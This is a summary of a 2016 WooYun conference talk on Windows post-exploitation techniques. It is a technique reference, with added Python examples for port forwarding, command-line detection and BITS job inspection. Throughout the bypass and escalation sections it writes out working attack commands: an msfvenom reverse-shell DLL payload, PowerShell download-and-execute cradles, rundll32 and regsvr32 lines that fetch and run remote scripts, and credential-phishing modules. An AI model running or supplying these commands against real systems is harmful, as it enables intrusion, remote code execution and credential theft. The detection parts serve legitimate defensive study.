Summary of common post-exploitation techniques (wooyun whitehatfest 2016)

Summary

Main post-exploitation activities

  • Proxy
  • Bypass Application Whitelisting
  • Escalate Privileges
  • Information Gathering
  • Persistence
  • Detection and Mitigations

Proxy

Port forwarding: client-side tools -> lcx, netsh (interface portproxy); over HTTP -> Tunnel; Metasploit -> portfwd

SOCKS proxy: client-side tools -> EW (EarthWorm), XSocks; over HTTP -> reGeorg; Metasploit -> auxiliary/server/socks4a

Other: SSH tunnels, ICMP tunnels, VPN
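As an added example of what the port-forwarding tools above do (this is not code from the talk), here is a minimal TCP forwarder in Python in the lcx role: it listens on one port and relays every connection to a target host:port in both directions. The echo service it forwards to is a constructed stand-in for an internal service, so the demo runs offline.

```python
"""Minimal TCP port forwarder (the lcx / netsh portproxy role): accept on one
port, relay each connection to target host:port in both directions.
Added example; the echo service is a constructed target so it runs offline."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the
    far side sees EOF too and the other direction can drain."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class PortForwarder:
    def __init__(self, listen_host, listen_port, target_host, target_port):
        self.target = (target_host, target_port)
        self._listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._listener.bind((listen_host, listen_port))
        self._listener.listen(16)
        self.port = self._listener.getsockname()[1]  # real port when 0 was asked for
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()
        return self

    def stop(self):
        # Closing the listener makes accept() raise and ends the serve loop.
        self._listener.close()

    def _serve(self):
        while True:
            try:
                client, _ = self._listener.accept()
            except OSError:
                return
            threading.Thread(target=self._relay, args=(client,), daemon=True).start()

    def _relay(self, client):
        try:
            upstream = socket.create_connection(self.target, timeout=5)
        except OSError:
            client.close()  # target unreachable: drop the client
            return
        upstream.settimeout(None)
        back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
        back.start()
        _pump(client, upstream)  # client -> target in this thread
        back.join()  # wait until target -> client has drained as well
        client.close()
        upstream.close()


def start_echo_server():
    """Constructed stand-in for an internal service: echoes one connection."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve_one():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(65536)
                if not data:
                    break
                conn.sendall(data)
        srv.close()

    threading.Thread(target=serve_one, daemon=True).start()
    return srv.getsockname()[1]


def forward_roundtrip(payload):
    """Send payload through a forwarder to the echo server; return what came back."""
    target_port = start_echo_server()
    fwd = PortForwarder("127.0.0.1", 0, "127.0.0.1", target_port).start()
    try:
        with socket.create_connection(("127.0.0.1", fwd.port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # done sending; now wait for the echo
            chunks = []
            while True:
                data = c.recv(65536)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        fwd.stop()


if __name__ == "__main__":
    print(forward_roundtrip(b"ping through the forwarder"))
```

On an engagement the target would be a host reachable only from the compromised machine and the listener would be bound to an interface the operator can reach. On the defensive side, the same process owning a listening socket plus paired outbound connections is the footprint that lcx-style tools leave.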

Bypass Application Whitelisting

Bypass approaches

  • HTA
  • Office Macro
  • Cpl
  • Chm
  • Powershell
  • Rundll32
  • Regsvr32
  • Regsvcs
  • Installutil

HTA

VBScript

mshta.exe vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

JavaScript

mshta.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WScript.Shell").Run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

Both one-liners run the payload through WScript.Shell inside the mshta.exe host process. In the JavaScript variant, Run() returns an exit code rather than an HTTP object, so h.Send() throws and the catch branch is what terminates mshta.exe afterwards.

Office Macro

MacroRaptor (mraptor, part of oletools) detects macros that look malicious:
https://bitbucket.org/decalage/oletools/wiki/mraptor

DLL/CPL

Generate payload.dll:
msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll

http://drops.wooyun.org/tips/16042

(1) Run the DLL directly: rundll32 shell32.dll,Control_RunDLL payload.dll
(2) Rename the DLL to .cpl and double-click it (Control Panel loads it through the same Control_RunDLL path)
(3) An ordinary DLL works as well; only the extension needs changing

CHM

Advanced combination tricks for a perfect bundled backdoor:
http://drops.wooyun.org/tips/14254

Using a system CHM file as a covert backdoor:
"Tricks we played with over the years" (那些年我们玩过的奇技淫巧)

PowerShell

Commands

powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString("http://ip:port")
Get-Content payload.ps1 | iex
cmd.exe /K <payload.bat>

LNK

powershell -nop -w hidden -E YwBhAGwAYwAuAGUAeABlAA==

-E (-EncodedCommand) takes the base64 of the UTF-16LE script text; the blob above decodes to calc.exe.

If powershell.exe is blocked:

Rundll32

JavaScript

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port');")

DLL

rundll32 shell32.dll,Control_RunDLL payload.dll

http://drops.wooyun.org/tips/11764

Regsvr32

Three ways to launch

regsvr32 /u /n /s /i:payload.sct scrobj.dll

regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll

Right-click the .sct file -> Register

/n skips DllRegisterServer and /i hands the scriptlet path or URL to scrobj.dll's DllInstall, which fetches and runs it; because /u makes it an uninstall no COM registration is written, and the URL form needs no file on disk.

http://subt0x10.blogspot.jp/2016/04/bypass-application-whitelisting-script.html

http://drops.wooyun.org/tips/15124

Regsvcs

regsvcs.exe (like regasm.exe) registers a .NET assembly and, while doing so, runs any method marked [ComRegisterFunction], which is where the payload goes:
https://gist.github.com/subTee/e1c54e1fdafc15674c9a

Installutil

Compile

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:InstallUtil.exe InstallUtil.cs

Run it through the .NET installer tool with /U, which executes the Uninstall method of the assembly's Installer subclass:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtil.exe

http://subt0x10.blogspot.jp/2015/08/application-whitelisting-bypasses-101.html

http://drops.wooyun.org/tips/8862

Executable directories

AppLocker's default rules allow execution from the Windows and Program Files directories, so any writable subdirectory there is a bypass; scan for writable paths with a PowerShell script:

http://go.mssec.se/AppLockerBC
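Every technique in this section leaves its argument string in the process command line, which is where Sysmon event 1 / Security event 4688 logging and EDR catch it. The following is an added example (not from the talk) that classifies command lines against the patterns shown above and decodes -EncodedCommand blobs so the analyst sees the script that actually runs. The sample command lines are constructed, several copied from the one-liners on this page, with http://ip:port left as the placeholder the page uses.

```python
"""Flag process command lines that match the application-whitelisting bypasses
listed above.  Added example; the sample command lines are constructed."""
import base64
import re

# (tag, regex) pairs matched case-insensitively against the whole command
# line.  A single line may collect several tags.
RULES = [
    ("mshta-inline-script",
     re.compile(r"\bmshta(?:\.exe)?\b.*\b(?:vbscript|javascript):", re.I)),
    ("rundll32-javascript",
     re.compile(r"\brundll32(?:\.exe)?\b.*\bjavascript:", re.I)),
    ("rundll32-control_rundll",
     re.compile(r"\brundll32(?:\.exe)?\b.*\bshell32\.dll\s*,\s*Control_RunDLL\b", re.I)),
    ("regsvr32-scrobj",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:\S+.*\bscrobj\.dll\b", re.I)),
    ("regsvcs-regasm",
     re.compile(r"\b(?:regsvcs|regasm)(?:\.exe)?\b", re.I)),
    ("installutil-uninstall",
     re.compile(r"\binstallutil(?:\.exe)?\b.*\s/u\b", re.I)),
    ("powershell-download-cradle",
     re.compile(r"\bpowershell(?:\.exe)?\b.*\b(?:iex|invoke-expression)\b.*\bdownloadstring\b", re.I)),
]

POWERSHELL = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
# powershell.exe accepts unambiguous prefixes of -EncodedCommand; the forms
# commonly seen are -e, -ec, -enc and the full name.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_IN_SCRIPT = re.compile(r"\b(?:iex|invoke-expression)\b.*\bdownloadstring\b", re.I)


def decode_encoded_command(b64):
    """-EncodedCommand carries the script as base64 of its UTF-16LE text.
    Raises ValueError (binascii.Error) when the blob is not valid base64."""
    raw = base64.b64decode(b64, validate=True)
    return raw.decode("utf-16-le", errors="replace")


def classify(cmdline):
    """Return the tags that fire on one command line and, for encoded
    PowerShell, the decoded script."""
    tags = [tag for tag, rx in RULES if rx.search(cmdline)]
    decoded = None
    m = ENCODED_FLAG.search(cmdline) if POWERSHELL.search(cmdline) else None
    if m:
        try:
            decoded = decode_encoded_command(m.group(1))
            tags.append("powershell-encoded")
        except ValueError:
            tags.append("powershell-encoded-undecodable")
        # A download cradle hidden inside the blob is only visible after
        # decoding, so the cradle rule is re-run over the decoded text.
        if decoded and CRADLE_IN_SCRIPT.search(decoded) and "powershell-download-cradle" not in tags:
            tags.append("powershell-download-cradle")
    return {"cmdline": cmdline, "tags": tags, "decoded": decoded}


def flagged(cmdlines):
    """Only the command lines that matched at least one rule."""
    return [r for r in map(classify, cmdlines) if r["tags"]]


def encode_for_powershell(script):
    """Builds an -EncodedCommand blob (used here only to construct a sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample, mostly lifted from the one-liners on this page; the last
# entry is benign and must not be flagged.
SAMPLE_CMDLINES = [
    'mshta.exe vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)',
    r"""rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port');")""",
    "rundll32 shell32.dll,Control_RunDLL payload.dll",
    "regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll",
    r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe payload.dll",
    r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtil.exe",
    "powershell -nop -w hidden -E YwBhAGwAYwAuAGUAeABlAA==",
    "powershell -nop -w hidden -enc "
    + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://ip:port')"),
    r'"C:\Program Files\Vendor\update.exe" /silent',
]

if __name__ == "__main__":
    for hit in flagged(SAMPLE_CMDLINES):
        print(hit["tags"], hit["decoded"] or "", hit["cmdline"][:60])
```

The rules key on the argument shapes that distinguish abuse from normal use (a javascript: or vbscript: URI handed to mshta or rundll32, a /i: scriptlet passed to scrobj.dll, /U on InstallUtil, a download-and-IEX cradle), because the binaries themselves are signed and present on every host; blocking them outright is usually not an option, which is why command-line logging matters here.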

Escalation

Common privilege escalation routes

  • local privilege escalation exploits
  • service-based escalation
  • protocol-based escalation
  • phishing

Local privilege escalation

Script that matches the installed patch list against known vulnerabilities:
https://github.com/GDSSecurity/Windows-Exploit-Suggester
Export the victim's systeminfo to a file:
systeminfo > 1.txt
Run the script against it (the .xls is the Microsoft security bulletin database the script fetches with --update):
python windows-exploit-suggester.py --database 2016-05-31-mssb.xls --systeminfo ~/Desktop/1.txt

The exploit binary may be killed by antivirus

Port the exploit to PowerShell

http://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html

Service-based escalation

Common services: MSSQL, MySQL, Oracle, FTP
Third-party services: DLL hijacking, file hijacking

Escalation script: PowerUp
https://drops.wooyun.org/tips/11989

Protocol-based escalation

Abusing known Windows behaviour to gain local privilege escalation -> Potato
It combines NTLM relay (specifically HTTP -> SMB relay) with NBNS spoofing

http://tools.pwn.ren/2016/01/17/patato-windows.html

Phishing

MSF ask module

exploit/windows/local/ask

Launches the payload via runas, so the user is shown a UAC prompt; if they click through it, the payload runs elevated

MSF script to modify:
metasploit/lib/msf/core/post/windows/runas.rb

Information Gathering

LaZagne (recovers passwords stored on the host)

Targets:
  • mstsc (RDP) connection history
  • browser history
  • local user passwords
  • saved WiFi SSIDs and passwords
  • recently opened files
  • system info
  • certificates!
  • installed programs: startup items
  • installed services: security services, file/printer shares, database servers, certificate authority
  • sensitive data: keylogging, screen capture, network traffic
  • user information
  • system configuration: password policy, security policies, configured wireless networks and keys

Keylogging
Screen recording
NetRipper (hooks network functions inside the target process to capture traffic before it is encrypted)

Phishing for passwords
Pop up an authentication prompt from a script:
https://github.com/Ridter/Pentest/blob/master/note/Powershell_MSFCapture.md

MSF module
post/windows/gather/phish_windows_credentials

Bypass UAC

Fileless attacks

  • powershell
  • jsrat
  • mshta
  • sct
  • wsc

Persistence

  • startup folder items
  • registry run keys
  • WMI event subscriptions
  • at
  • schtasks
  • hijacking an existing third-party service
  • bitsadmin

Detection

List every BITS job, including other users' (bitsadmin persistence hangs a command off a job's notification command line):
bitsadmin /list /allusers /verbose

Mitigation: stop the Background Intelligent Transfer Service
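An added example (not from the talk) that parses the output of the bitsadmin /list /allusers /verbose command above and flags jobs carrying a notification command line, the hook that bitsadmin-based persistence uses. The listing below is constructed in the shape of bitsadmin's verbose output, with field names as bitsadmin prints them; spacing and the exact set of fields are approximated, and the job names, paths and GUIDs are made up.

```python
"""Parse `bitsadmin /list /allusers /verbose` output and flag BITS jobs that
carry a notification command line.  Added example; the listing is constructed."""
import re

# Constructed in the shape of bitsadmin's verbose listing (field names as
# bitsadmin prints them; spacing and field set approximated).
SAMPLE_BITSADMIN_OUTPUT = r"""
BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

GUID: {3F2504E0-4F89-41D3-9A0C-0305E82C3301} DISPLAY: WindowsUpdateHelper
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: WORKSTATION\alice
PRIORITY: NORMAL FILES: 1 / 1 BYTES: 512 / 512
CREATION TIME: 2016/06/01 10:00:00 MODIFICATION TIME: 2016/06/01 10:00:05
COMPLETION TIME: UNKNOWN ACL FLAGS:
NOTIFY INTERFACE: UNREGISTERED NOTIFICATION FLAGS: 3
RETRY DELAY: 600 NO PROGRESS TIMEOUT: 1209600 ERROR COUNT: 0
JOB FILES:
    512 / 512 WORKING http://ip:port/payload.ps1 -> C:\Users\alice\AppData\Local\Temp\payload.ps1
NOTIFICATION COMMAND LINE: powershell.exe -nop -w hidden -exec bypass -f C:\Users\alice\AppData\Local\Temp\payload.ps1

GUID: {3F2504E0-4F89-41D3-9A0C-0305E82C3302} DISPLAY: Edge Update
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: NT AUTHORITY\SYSTEM
PRIORITY: NORMAL FILES: 1 / 1 BYTES: 4096 / 4096
JOB FILES:
    4096 / 4096 WORKING http://update.example.test/update.cab -> C:\Windows\Temp\update.cab
NOTIFICATION COMMAND LINE: none

Listed 2 job(s).
"""

GUID_LINE = re.compile(r"^GUID:\s*(\{[0-9A-Fa-f-]{36}\})\s+DISPLAY:\s*(.*?)\s*$")
NOTIFY_RX = re.compile(r"^NOTIFICATION COMMAND LINE:\s*(.*?)\s*$")
# "<done> / <total> <status> <remote url> -> <local path>"
FILE_RX = re.compile(r"^\s*\S+\s*/\s*\S+\s+\S+\s+(\S+)\s+->\s+(.+?)\s*$")
STATE_RX = re.compile(r"\bSTATE:\s*(\S+)")
OWNER_RX = re.compile(r"\bOWNER:\s*(.+?)\s*$")


def parse_bitsadmin_list(text):
    """Split the listing into one dict per job (a new job starts at each GUID: line)."""
    jobs, job = [], None
    for line in text.splitlines():
        m = GUID_LINE.match(line)
        if m:
            job = {"guid": m.group(1), "display": m.group(2), "state": None,
                   "owner": None, "files": [], "notify_cmd": None}
            jobs.append(job)
            continue
        if job is None:
            continue  # banner lines before the first job
        m = NOTIFY_RX.match(line)
        if m:
            value = m.group(1)
            job["notify_cmd"] = None if value.lower() in ("", "none") else value
            continue
        m = FILE_RX.match(line)
        if m:
            job["files"].append({"remote": m.group(1), "local": m.group(2)})
            continue
        m = STATE_RX.search(line)
        if m and job["state"] is None:
            job["state"] = m.group(1)
        m = OWNER_RX.search(line)
        if m and job["owner"] is None:
            job["owner"] = m.group(1)
    return jobs


def suspicious_bits_jobs(jobs):
    """Jobs with a notification command line: BITS runs that command when the
    transfer finishes, which is the persistence hook.  Each hit carries the
    bitsadmin command that removes the job."""
    return [dict(job, remediation=f"bitsadmin /cancel {job['guid']}")
            for job in jobs if job["notify_cmd"]]


if __name__ == "__main__":
    for hit in suspicious_bits_jobs(parse_bitsadmin_list(SAMPLE_BITSADMIN_OUTPUT)):
        print(hit["guid"], hit["owner"], hit["notify_cmd"])
        print("  ", hit["remediation"])
```

A legitimate job without a notification command is left alone, as in the second sample job; a job whose command points at a script interpreter and whose downloaded file lives in a user-writable temp directory, as in the first, is the pattern to cancel and then investigate.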

References

Wooyun WhiteHat Conference 2016, "Shell Is Only The Beginning", 3gstudent and evi1cg